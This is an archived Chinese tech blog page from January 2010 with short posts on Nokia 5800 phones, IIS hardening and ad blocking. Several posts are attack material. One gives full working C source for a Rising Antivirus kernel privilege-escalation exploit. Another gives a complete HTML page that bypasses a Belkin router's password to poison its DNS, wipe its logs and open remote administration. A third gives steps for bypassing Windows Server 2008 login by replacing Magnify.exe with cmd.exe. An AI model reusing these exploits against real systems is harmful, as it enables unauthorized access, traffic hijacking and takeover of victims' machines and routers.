存档

2010年1月 的存档

瑞星本地提权通杀利用代码

2010年1月31日 没有评论 258 views

编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本

//MY Blog:http://hi.baidu.com/9908006

//MY QQ:165659238

//VC-ConsoleWithApi

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

0

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

0

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img.SizeOfRawData)

Limit = Img.SizeOfRawData;

else

Limit = Img.Misc.VirtualSize;

if (Rva >= Img.VirtualAddress &&

Rva < (Img.VirtualAddress + Limit))

{

if (Img.PointerToRawData != 0)

{

Offset -= Img.VirtualAddress;

Offset += Img.PointerToRawData;

}

return Offset;

}

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

}

}

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");

g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,

0,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

0,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

分类: 技术文章 标签: , ,

ASP.NET+Win2003虚拟主机安全设置

2010年1月27日 没有评论 103 views

我们举例详细说明在运行ASP.NET的 windows 2003虚拟主机上,对于多个ASP.NET站点的安全配置;
在这里,我们的站点目录放在D盘的www文件夹,假设现在有一个名叫fesend的虚拟主机用户,我们在www文件夹下建立 fesend 的文件夹来存放此用户的站点数据

其中要用到以下组及帐号:
IIS_WPG 组(也称为 IIS 工作进程组,IIS Worker Process Group)
Guests组 (来宾组,在系统中拥有最少的权限)

Internet 来宾帐户 (匿名访问 Internet 信息服务的内置帐户)
启动 IIS 进程帐户 (用于启动进程外应用程序的 Internet 信息服务的内置帐户)
阅读全文...

分类: 技术文章 标签: , ,

5800备份和恢复资料

2010年1月22日 没有评论 2,468 views

1、备份

按功能表----》应用程序----》

阅读全文...

分类: 影音娱乐 标签: ,

5800详细刷机步骤

2010年1月22日 没有评论 2,060 views

>>>>>>>>>>>>>>>>>>>>升级存在一定风险,使用前请三思.<<<<<<<<<<<<<<<<<<<

一、了解5800MX其本知识

1、5800MX频段

RM-427:只支持GSM 900/1800
RM-356:HSDPA,WCDMA  900/2100
RM-428:HSDPA,WCDMA  850/1900

2、销售地区

RM-356:销售地区包括香港、亚太、欧洲等。
RM-428:美版,不能用国内的3G(W-CDMA),销售地区包括北美、南美、澳洲等。
RM-427:国行(包括定制机),无WLAN、3G。专为中国设计。

3、快捷键

*#06#     查询IMEI号码 所有手机
*#0000#   查询当前软件版本号  所有手机通用
*#2820# 查询蓝牙设备地址   S60和S40手机通用
*#7370#   格式化手机(原始密码12345)

二、可升级Code

1、升级V31有中文Code,已测试,
阅读全文...

分类: 影音娱乐 标签: ,

贝尔金无线路由器漏洞

2010年1月22日 没有评论 140 views

<html>

<head>

</head>

<body>

<b>这个HTML代码可以绕过webinterface密码保护的贝尔金无线路由器+ADSL2调制解调器<br>

它的工作模式F5D7632-4V6与升级固件6.01.08</b>

<br>

<form action="http://192.168.2.1/cgi-bin/setup_dns.exe" name=dnspoison method=post>

改变DNS域名服务器(IP可以不一样)<br>

<input name=page type=hidden value="setup_dns">

<input name=logout type=hidden value="">

<input name=auto_from_isp type=hidden value="0">

<input name=dns1_1 type=text value="1">

<input name=dns1_2 type=text value="2">

<input name=dns1_3 type=text value="3">

<input name=dns1_4 type=text value="4">

<br>

<input name=dns2_1 type=text value="1">

<input name=dns2_2 type=text value="2">

<input name=dns2_3 type=text value="3">

<input name=dns2_4 type=text value="5">

<br>

<input name=submit type=submit value="放毒">

</form>

<br>

<br>

<form action="http://192.168.2.1/cgi-bin/statusprocess.exe" name=clearlog method=post>

清除日志文件<br>

<input name=securityclear type=submit value="清除">

</form>

<br>

<br>

<form ACTION="http://192.168.2.1/cgi-bin/system_all.exe" method=post name=changepassword>

改变时间、密码(如果您有旧的密码)、远程管理、UPnP<br>

和自动固件更新(美好的结合DNS中毒)<br>

<input type="hidden" name="restart_time" value="0">

<input type="hidden" name="reload" value="1">

<input type="hidden" name="restart_page" value='document.location.href="system.stm";'>

<input type="hidden" name="location_page" value="system.stm">

<input type="hidden" name="server1" value="">

<input type="hidden" name="server2" value="">

<!-- for clock -->

<input type="hidden" name="year" value="">

<input type="hidden" name="mon" value="">

<input type="hidden" name="day" value="">

<input type="hidden" name="hour" value="">

<input type="hidden" name="min" value="">

<input type="hidden" name="sec" value="">

<br>旧密码<br>

<input type="password" size="12" maxlength="12" name="userOldPswd" value="">

<br>新密码,两次<br>

<input type="password" size="12" maxlength="12" name="userNewPswd" value="">

<input type="password" size="12" maxlength="12" name="userConPswd" value="">

<br>登录超时(1-99分钟)<br>

<input type="text" name="timeout" size="3" maxlength="3" value="10">

<br> 时间和时区:<br>

夏令: <br>

<input type="checkbox" name="daylight" value="1">时区(号码)<br>

<input type="text" name="time_zone" value="26">

<input type="checkbox" name="enable_ntp" value="1">启用自动时间服务器维护<br>

<tr>

<td width="240">主服务器</td>

<td width="360">

<select name="time1">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<tr>

<td width="240">副服务器</td>

<td width="360">

<select name="time2">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<br>远程管理:<br>

<input type="checkbox" name="allow_all" value="1">任何IP地址都可以远程管理路由器<br>

只有这个IP地址可以远程管理路由器<br>

<input name="IP1" size="3" maxlength="3" value="0">.

<input name="IP2" size="3" maxlength="3" value="0">.

<input name="IP3" size="3" maxlength="3" value="0">.

<input name="IP4" size="3" maxlength="3" value="0">

<br> 远程端口:

<input name="REMOTEPORT" size="5" maxlength="5" value="0">

<br>NAT 授权:<br>

<input type=radio name=Nat_enable value=1>授权<br>

<input type=radio name=Nat_enable value=0>废除<br>

<br>UPnP<br>

<input type="radio" name="upnp_enable" value=1>授权<br>

<input type=radio name=upnp_enable value=0>废除<br>

<br>自动更新固件<br>

<input type="radio" name="autoUpdate_enable" value=1>授权<br>

<input type="radio" name="autoUpdate_enable" value=0>废除<br>

</form>

<form method="POST" action="http://192.168.2.1/cgi-bin/restore.exe" name="RebootForm">

<br>恢复出厂默认值(包括密码)<br>

<input type="hidden" name="page" value="tools_restore">

<input type="hidden" name="logout">

<input type="submit" value="恢复默认值" style="{width:120px;}" class="submitBtn">

</form>

</body>

</html>

分类: 技术文章 标签:

绕过 Windows Server 2008的密码保护

2010年1月22日 没有评论 113 views

Windows Server 2008是微软Windows服务器产品中最新的操作系统版本。它是基于Windows NT 6.0 SP1的内核。
Microsoft详细信息:http://www.microsoft.com/china/windowsserver2008/

虽然与早期版本相比非常安全,但它可以很容易地绕过密码保护进入主机。
在本文中,我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。


概念演示:
为了能够绕过密码保护,我们首先需要添加PING CD盘(http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso)或其他支持 NTFS-3G驱动的Linux Live光盘(NTFS-3G是一个跨平台执行的Windows NTFS文件系统,支持读/写能力)。

我们首先检查哪个分区是Windows NTFS分区,在这个例子中是/dev/sd1。
fdisk –l | grep NTFS

然后,我们创建目录,将安装Windows文件:
mkdir –p /mnt/windows

因此,我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中:
mount –t ntfs-3g /dev/sda1/mnt/windows

现在,我们将一个可执行文件cmd.exe替换为Magnify.exe文件:
mv Magnify.exe Magnify.bck
cp cmd.exe Magnify.exe

阅读全文...

分类: 技术文章 标签:

IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告

2010年1月20日 没有评论 213 views

谷歌,Adobe和其他大公司有针对性的攻击的消息上周已经被披露,最初安全人员们预计是采用恶意的PDF文件进行攻击,但在上周四,微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。
目前已经检测到针对此漏洞的攻击代码正在蔓延,相应的恶意代码页面也已经出现,安全研究机构WebSense今日发出安全警告,以下是技术分析截图:

http://www.4shell.org/wp-content/uploads/images/2010/01/10114162i.png
阅读全文...

分类: 业界资讯 标签: ,

5800 C盘各文件夹介绍以及存储卡的文件夹说明

2010年1月20日 没有评论 413 views

1. C盘文件的具体介绍
C盘文件的具体介绍·(E盘文件的原理和C盘基本一样)·
Images 图像,图片存储文件夹
Sounds 声音片段,包含两个子文件夹
Sounds/Simple 铃声
Sounds/Digital 数字声音
Videos 视频片段,视频文件存储文件夹
Others 其他
System 是手机安装文件的系统文件夹下面对它里面的文件和文件夹做下具体的介绍:
Apps 存放的是安装软件程序的文件夹。
Apps/Phone 是更改网标后形成的文件夹,此目录中还有oplogo的子目录,bmp文件就存在这个目录里,删除这个文件就可以恢复手机默认的网标。
bootdata 存放的是手机导入数据,最好不要删除或者修改里面的文件。
Data 存放的是如ini、dat、cdr等后缀的文件,这些是程序所保存设置的数据,最好不要删除或者修改里面的文件。
dataNotepad.dat 存放的是记事本中的内容。
databackgroundimage.mbm 存放的是桌面墙纸图片文件。
dataApplications.dat 存放的是程序数据文件。
datawapstore 存放的是用WAP上网时的一些设定和网页缓存。
systemDataCLOCKAPP.dat 存放的是时钟设定存档文件。
systemDataCntModel.ini 存放的是电话本初始化文件。
systemDataContacts.cdb 存放的是电话本数据文件。
systemDataLogdbu.dat 手机的通讯数据文件。
systemDatamedialPlayer.dat 自带的RealOne播放机。
systemDatamms_seting.Dat 彩信的设置。
systemDataPinboard 捷径。
systemDataCalcsoft 自带的计算器。
systemDataCalendar 自带的日历。
DataTemplate.n01 存放的是手机短信信模版文件。
DataUnitConverter.int 手存放的是单位转换器初始化文件。
DataBookmarks.db 存放的是书签数据文件,用来记录WAP地址。
DataCACerts.dat 存放的是安装各种软件的证书文件。
Mail 目录下存放着短消息、彩信、电子邮件以及相关的一些设置文件。
SKINS 存放的是主题文件。
Shareddata 存放的是一些程序运行后的写入设置数据。
Temp和YReg 存放的是些临时目录。
Libs 目录里存放着软件相关的dll文件。
midp 存放的是安装的java程序。
Mtm 是有关信息设置的目录
Programs 存放的是一些自动加载的程序文件。
Recogs 存放的是关联方式文件的目录。
Schedules 存放的是一些计划任务类的文件。
favourites 存放的是收藏夹的文件,可移动到E盘的System中,收藏夹是不会受到影响。
install 存放的是软件的安装记录,其中install log文件可以删除,而带有sis后缀的文件最好不要删除,以免以后不能在程序管理里看到并删除程序了。
Magic101 在安装MGS平台的程序以后以后才会生成。
System.ini 系统初始化配置文件,可以删除,但是下次开机使用程序,系统还会再次生成。
Backup.xml 存放的是备份数据
**注意** C盘里面大多是系统文件,不知道它是究竟什么,以及具体的作用是什么,最好不要删除,以免删错了以后,导致手机的一些程序不能正常运行。
阅读全文...

分类: 资源共享 标签: ,

手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】

2010年1月19日 没有评论 320 views

现在越来越多的人在迅雷上看电影了。我也很喜欢,但是我很不喜欢迅雷看看上的15秒广告。当然,也有迅雷工具的广告也很麻烦。于是,我就在网络上搜罗了一翻,找到了一些迅雷屏蔽的技巧。
[修改时,请先将迅雷程序关闭!]

1. 去除迅雷看看15秒广告

在 C:WINDOWSsystem32driversetc 目录下,用记事本打开 hosts 文件。

复制内容到剪贴板 程序代码
找到
127.0.0.1 localhost
在之后加入
------ 屏蔽迅雷看看广告 ------
0.0.0.0 pubstat.sandai.net
0.0.0.0 mcfg.sandai.net
0.0.0.0 biz5.sandai.net
0.0.0.0 float.sandai.net
0.0.0.0 recommend.xunlei.com
0.0.0.0 cl.kankan.xunlei.com

2. 禁止迅雷偷偷上传
阅读全文...

分类: 技术文章 标签: ,

MyBB 1.4 admin remote code execution vulnerability

2010年1月18日 没有评论 96 views

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下:

//index.php,336行左右

$plugins->run_hooks("index_end");
//出现了eval函数,注意参数
eval("$index = "".$templates->get("index")."";");
output_page($index);

看以下eval()函数中的内容是否可以控制,继续找到templates类查看get函数的定义:
阅读全文...

分类: 矩阵毒刺 标签:

Nokia 5800相机参数设置拍出清晰的照片

2010年1月18日 没有评论 1,265 views

一直在测试5800的各项功能,也遇到了网友说到的一些问题,包括照相问题,在没有任何设置的时候拍下一张照片,非常难看,很模糊,一开始以为是5800自带相机问题,还有的人说5800相机水准不行,经过我的测试,不是这样的,只是我们不会用5800相机而已,其实5800不同于我们以往用的手机拍摄,一键搞定,5800拍照需要很多设置,我要教大家的是如何去设置,这些设置都有什么用。如果你明白了,肯定是会拍出清晰的照片。
1.如何进入设置?哪些个设置重要?哪些个设置不需要动,影响不大.


阅读全文...

分类: 影音娱乐 标签: ,

BT4 final到移动硬盘上了

2010年1月14日 没有评论 2,748 views

1、下载HP_USB_FW.rar,This tool can setup a booting USB flash disk。他可以创建dos的引导程序到U盘里面。下载后解压,执行HPUSBFW.EXE,选FAT32文件系统,快速格式化,要选中创建dos启动 盘,路径指向解压目录下的HPUSBFW目录,这个目录下有引导程序COMMAND.COM、IO.SYS、MSDOS.SYS,这3个文件在格式化完成 后被copy到移动硬盘跟目录下。

HP USB FW

阅读全文...

分类: 技术文章 标签: